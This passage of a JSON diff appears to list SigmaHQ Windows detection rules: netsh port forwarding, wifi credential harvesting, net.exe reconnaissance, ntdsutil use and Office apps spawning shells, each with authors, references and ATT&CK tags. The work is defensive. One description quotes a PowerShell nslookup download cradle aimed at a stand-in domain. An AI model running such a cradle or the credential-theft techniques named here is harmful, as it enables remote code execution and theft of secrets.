"Netsh Allow Group Policy on Microsoft Defender Firewall" + }, + { + "description": "Detects capture a network trace via netsh.exe trace functionality", + "meta": { + "author": "Kutepov Anton, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate administrator or user uses netsh.exe trace functionality for legitimate reason" + ], + "filename": "proc_creation_win_netsh_packet_capture.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + 
"refs": [ + "https://blogs.msdn.microsoft.com/canberrapfe/2012/03/30/capture-a-network-trace-without-installing-anything-capture-a-network-trace-of-a-reboot/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_packet_capture.yml" + ], + "tags": [ + "attack.discovery", + "attack.credential_access", + "attack.t1040" + ] + }, + "uuid": "d3c3861d-c504-4c77-ba55-224ba82d0118", + "value": "Capture a Network Trace with netsh.exe" + }, + { + "description": "Detects netsh commands that configure a port forwarding (PortProxy)", + "meta": { + "author": "Florian Roth, omkar72, oscd.community", + "creation_date": "2019/01/29", + "falsepositive": [ + "Legitimate administration", + "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)" + ], + "filename": "proc_creation_win_netsh_port_fwd.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", + "https://adepts.of0x.cc/netsh-portproxy-code/", + "https://www.dfirnotes.net/portproxy_detection/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_port_fwd.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1090" + ] + }, + "uuid": "322ed9ec-fcab-4f67-9a34-e7c6aef43614", + "value": "Netsh Port Forwarding" + }, + { + "description": "Detects netsh commands that configure a port forwarding of port 3389 used for RDP", + "meta": { + "author": "Florian Roth, oscd.community", + "creation_date": "2019/01/29", + "falsepositive": [ + "Legitimate administration" + ], + "filename": "proc_creation_win_netsh_port_fwd_3389.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": 
"windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_port_fwd_3389.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1090" + ] + }, + "uuid": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", + "value": "Netsh RDP Port Forwarding" + }, + { + "description": "Detect the harvesting of wifi credentials using netsh.exe", + "meta": { + "author": "Andreas Hunkeler (@Karneades), oscd.community", + "creation_date": "2020/04/20", + "falsepositive": [ + "Legitimate administrator or user uses netsh.exe wlan functionality for legitimate reason" + ], + "filename": "proc_creation_win_netsh_wifi_credential_harvesting.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_wifi_credential_harvesting.yml" + ], + "tags": [ + "attack.discovery", + "attack.credential_access", + "attack.t1040" + ] + }, + "uuid": "42b1a5b8-353f-4f10-b256-39de4467faff", + "value": "Harvesting of Wifi Credentials Using netsh.exe" + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/09/25", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_netsupport.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsupport.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "758ff488-18d5-4cbe-8ec4-02b6285a434f", + "value": "Use of NetSupport Remote Access Software" + }, + { + "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system", + "meta": { + "author": "frack113", + "creation_date": "2022/03/12", + "falsepositive": [ + "Legitimate script" + ], + "filename": "proc_creation_win_network_scan_loop.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", + "https://ss64.com/nt/for.html", + "https://ss64.com/ps/foreach-object.htmll", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_network_scan_loop.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059", + "attack.discovery", + "attack.t1018" + ] + }, + "uuid": "f8ad2e2c-40b6-4117-84d7-20b89896ab23", + "value": "Suspicious Scan Loop Network" + }, + { + "description": "Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. 
An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2019/10/21", + "falsepositive": [ + "Admin activity" + ], + "filename": "proc_creation_win_network_sniffing.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_network_sniffing.yml" + ], + "tags": [ + "attack.credential_access", + "attack.discovery", + "attack.t1040" + ] + }, + "uuid": "ba1f7802-adc7-48b4-9ecb-81e227fddfd5", + "value": "Network Sniffing" + }, + { + "description": "Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/01", + "falsepositive": [ + "Some fasle positives could occure with the admin or guest account. It depends on the scripts being used by the admins in your env. 
If you experience a lot of FP you could reduce the level to medium" + ], + "filename": "proc_creation_win_net_default_accounts_manipulation.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html", + "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/", + "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_default_accounts_manipulation.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ] + }, + "uuid": "5b768e71-86f2-4879-b448-81061cbae951", + "value": "Suspicious Manipulation Of Default Accounts" + }, + { + "description": "Identifies attempts to enumerate hosts in a network using the built-in Windows net.exe tool.", + "meta": { + "author": "Endgame, JHasenbusch (ported for oscd.community)", + "creation_date": "2018/10/30", + "falsepositive": [ + "Legitimate use of net.exe utility by legitimate user" + ], + "filename": "proc_creation_win_net_enum.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/b8a94d2f-dc75-4630-9d73-1edc6bd26fff.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_enum.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1018" + ] + }, + "uuid": "62510e69-616b-4078-b371-847da438cc03", + "value": "Windows Network Enumeration" + }, + { + "description": "Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE", + "meta": { + "author": "Florian Roth, omkar72, 
@svch0st, Nasreddine Bencherchali", + "creation_date": "2019/01/16", + "falsepositive": [ + "Inventory tool runs", + "Administrative activity" + ], + "filename": "proc_creation_win_net_recon.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", + "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", + "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_recon.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002" + ] + }, + "uuid": "d95de845-b83c-4a9a-8a6a-4fc802ebf6c0", + "value": "Suspicious Reconnaissance Activity Using Net" + }, + { + "description": "Identifies creation of local users via the net.exe command.", + "meta": { + "author": "Endgame, JHasenbusch (adapted to Sigma for oscd.community)", + "creation_date": "2018/10/30", + "falsepositive": [ + "Legitimate user creation.", + "Better use event IDs for user creation rather than command line rules." 
+ ], + "filename": "proc_creation_win_net_user_add.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/014c3f51-89c6-40f1-ac9c-5688f26090ab.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_user_add.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.001" + ] + }, + "uuid": "cd219ff3-fa99-45d4-8380-a7d15116c6dc", + "value": "Net.exe User Account Creation" + }, + { + "description": "Detects creation of local users via the net.exe command with the option \"never expire\"", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/12", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_net_user_add_never_expire.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_user_add_never_expire.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.001" + ] + }, + "uuid": "b9f0e6f5-09b4-4358-bae4-08408705bd5c", + "value": "Net.exe User Account Creation - Never Expire" + }, + { + "description": "Detects when an admin share is mounted using net.exe", + "meta": { + "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, wagga", + "creation_date": "2020/10/05", + "falsepositive": [ + "Administrators" + ], + "filename": "proc_creation_win_net_use_admin_share.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_use_admin_share.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "3abd6094-7027-475f-9630-8ab9be7b9725", + "value": "Mounted Windows Admin Shares with net.exe" + }, + { + "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/23", + "falsepositive": [ + "Other legitimate network providers used and not filtred in this rule" + ], + "filename": "proc_creation_win_new_network_provider.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade", + "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_new_network_provider.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ] + }, + "uuid": "baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", + "value": "New Network Provider - CommandLine" + }, + { + "description": "Detects creation of a new service.", + "meta": { + "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/21", + "falsepositive": [ + "Legitimate administrator or user creates a service for legitimate reasons." 
+ ], + "filename": "proc_creation_win_new_service_creation.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_new_service_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "7fe71fc9-de3b-432a-8d57-8c809efc10ab", + "value": "New Service Creation" + }, + { + "description": "Detects usage of nimgrab, a tool bundled with the Nim programming framework, downloading a file. This can be normal behaviour on developer systems.", + "meta": { + "author": "frack113", + "creation_date": "2022/08/28", + "falsepositive": [ + "Legitimate use of Nim on developer systems" + ], + "filename": "proc_creation_win_nimgrab.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nimgrab.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "74a12f18-505c-4114-8d0b-8448dd5485c6", + "value": "Nimgrab File Download" + }, + { + "description": "Detects nltest commands that can be used for information discovery", + "meta": { + "author": "Craig Young, oscd.community, Georg Lauenstein", + "creation_date": "2021/07/24", + "falsepositive": [ + "Legitimate administration use but user must be check out" + ], + "filename": "proc_creation_win_nltest_recon.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)", + "https://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/", + "https://attack.mitre.org/techniques/T1482/", + "https://attack.mitre.org/techniques/T1016/", + "https://book.hacktricks.xyz/windows/basic-cmd-for-pentesters", + "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nltest_recon.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1016", + "attack.t1482" + ] + }, + "uuid": "5cc90652-4cbd-4241-aa3b-4b462fa5a248", + "value": "Recon Activity with NLTEST" + }, + { + "description": "Detects the execution node.exe which is shipped with multiple softwares such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/09", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_node_abuse.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://www.sprocketsecurity.com/resources/crossing-the-log4j-horizon-a-vulnerability-with-no-return", + "https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/", + "https://nodejs.org/api/cli.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_node_abuse.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ] + }, + "uuid": "6640f31c-01ad-49b5-beb5-83498a5cd8bd", + "value": "Node.exe Process Abuse" + }, + { + "description": "Detects non-interactive PowerShell activity by looking at powershell.exe with not explorer.exe as a parent.", 
+ "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)", + "creation_date": "2019/09/12", + "falsepositive": [ + "Legitimate programs executing PowerShell scripts" + ], + "filename": "proc_creation_win_non_interactive_powershell.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190410151110.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_non_interactive_powershell.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "f4bbd493-b796-416e-bbf2-121235348529", + "value": "Non Interactive PowerShell" + }, + { + "description": "Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry", + "meta": { + "author": "Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community", + "creation_date": "2020/10/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_non_priv_reg_or_ps.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-20-638.jpg", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_non_priv_reg_or_ps.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "8f02c935-effe-45b3-8fc9-ef8696a9e41d", + "value": "Non-privileged Usage of Reg or Powershell" + }, + { + "description": "Detects the use of NPS a port forwarding tool", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/10/08", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_nps.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", 
+ "refs": [ + "https://github.com/ehang-io/nps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nps.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090" + ] + }, + "uuid": "68d37776-61db-42f5-bf54-27e87072d17e", + "value": "NPS Tunneling Tool" + }, + { + "description": "Detects usage of powershell in conjunction with nslookup as a mean of download.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/05", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_nslookup_poweshell_download.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Alh4zr3d/status/1566489367232651264", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "1b3b01c7-84e9-4072-86e5-fc285a41ff23", + "value": "Nslookup PowerShell Download" + }, + { + "description": "This rule tries to detect powershell download cradles, e.g. powershell . 
(nslookup -q=txt http://some.owned.domain.com)[-1]", + "meta": { + "author": "Zach Mathis (@yamatosecurity)", + "creation_date": "2022/09/06", + "falsepositive": "No established falsepositives", + "filename": "proc_creation_win_nslookup_pwsh_download_cradle.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/alh4zr3d/status/1566489367232651264", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105", + "attack.t1071.004" + ] + }, + "uuid": "72671447-4352-4413-bb91-b85569687135", + "value": "Nslookup PwSh Download Cradle" + }, + { + "description": "Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2019/01/16", + "falsepositive": [ + "NTDS maintenance" + ], + "filename": "proc_creation_win_ntdsutil_usage.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntdsutil_usage.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ] + }, + "uuid": "2afafd61-6aae-4df4-baed-139fa1f4c345", + "value": "Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)" + }, + { + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection", + "meta": { + "author": "frack113, Nasreddine Bencherchali", + "creation_date": "2022/08/07", + "falsepositive": [ + "Applications could use this notation occasionally which might generate some false positives. In that case investigate the parent and child process." 
+ ], + "filename": "proc_creation_win_ntfs_short_name_path_use_cli.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", + "https://twitter.com/frack113/status/1555830623633375232", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ] + }, + "uuid": "349d891d-fef0-4fe4-bc53-eee623a15969", + "value": "Use Short Name Path in Command Line" + }, + { + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image detection", + "meta": { + "author": "frack113, Nasreddine Bencherchali", + "creation_date": "2022/08/07", + "falsepositive": [ + "Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process." 
+ ], + "filename": "proc_creation_win_ntfs_short_name_path_use_image.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", + "https://twitter.com/frack113/status/1555830623633375232", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_image.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ] + }, + "uuid": "a96970af-f126-420d-90e1-d37bf25e50e1", + "value": "Use Short Name Path in Image" + }, + { + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection", + "meta": { + "author": "frack113, Nasreddine Bencherchali", + "creation_date": "2022/08/05", + "falsepositive": [ + "Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process." 
+ ], + "filename": "proc_creation_win_ntfs_short_name_use_cli.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", + "https://twitter.com/jonasLyk/status/1555914501802921984", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_cli.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ] + }, + "uuid": "dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795", + "value": "Use NTFS Short Name in Command Line" + }, + { + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection", + "meta": { + "author": "frack113, Nasreddine Bencherchali", + "creation_date": "2022/08/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_ntfs_short_name_use_image.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", + "https://twitter.com/jonasLyk/status/1555914501802921984", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_image.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ] + }, + "uuid": "3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b", + "value": "Use NTFS Short Name in Image" + }, + { + "description": "Detects use of an encoded/obfuscated version of an IP address (hex, octal...) 
in an URL combined with a download command", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_obfuscated_ip_download.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://h.43z.one/ipconverter/", + "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_obfuscated_ip_download.yml" + ], + "tags": [ + "attack.discovery" + ] + }, + "uuid": "cb5a2333-56cf-4562-8fcb-22ba1bca728d", + "value": "Obfuscated IP Download" + }, + { + "description": "Detects usage of an encoded/obfuscated version of an IP address (hex, octal...) via commandline", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_obfuscated_ip_via_cli.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://h.43z.one/ipconverter/", + "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_obfuscated_ip_via_cli.yml" + ], + "tags": [ + "attack.discovery" + ] + }, + "uuid": "56d19cb4-6414-4769-9644-1ed35ffbb148", + "value": "Obfuscated IP Via CLI" + }, + { + "description": "Initial execution of malicious document calls wmic to execute the file with regsvr32", + "meta": { + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_office_applications_spawning_wmi_commandline.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + 
"https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_applications_spawning_wmi_commandline.yml" + ], + "tags": [ + "attack.t1204.002", + "attack.t1047", + "attack.t1218.010", + "attack.execution", + "attack.defense_evasion" + ] + }, + "uuid": "518643ba-7d9c-4fa5-9f37-baed36059f6a", + "value": "Office Applications Spawning Wmi Cli" + }, + { + "description": "Detects Office Applications executing a Windows child process including directory traversal patterns", + "meta": { + "author": "@SBousseaden (idea), Christian Burkard (rule)", + "creation_date": "2022/06/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_office_dir_traversal_cli.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/sbousseaden/status/1531653369546301440", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_dir_traversal_cli.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion" + ] + }, + "uuid": "868955d9-697e-45d4-a3da-360cefd7c216", + "value": "Office Directory Traversal CommandLine" + }, + { + "description": "Office application called wmic to proxye execution through a LOLBIN process. 
This is often used to break suspicious parent-child chain (Office app spawns LOLBin).", + "meta": { + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_office_proxy_exec_wmic.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_proxy_exec_wmic.yml" + ], + "tags": [ + "attack.t1204.002", + "attack.t1047", + "attack.t1218.010", + "attack.execution", + "attack.defense_evasion" + ] + }, + "uuid": "e1693bc8-7168-4eab-8718-cdcaa68a1738", + "value": "Office Processes Proxy Execution Through WMIC" + }, + { + "description": "Detects a Windows command and scripting interpreter executable started from Microsoft Word, Excel, Powerpoint, Publisher and Visio", + "meta": { + "author": "Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team", + "creation_date": "2018/04/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_office_shell.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100", + "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_shell.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ] + }, + "uuid": "438025f9-5856-4663-83f7-52f878a70a50", + "value": "Microsoft Office Product 
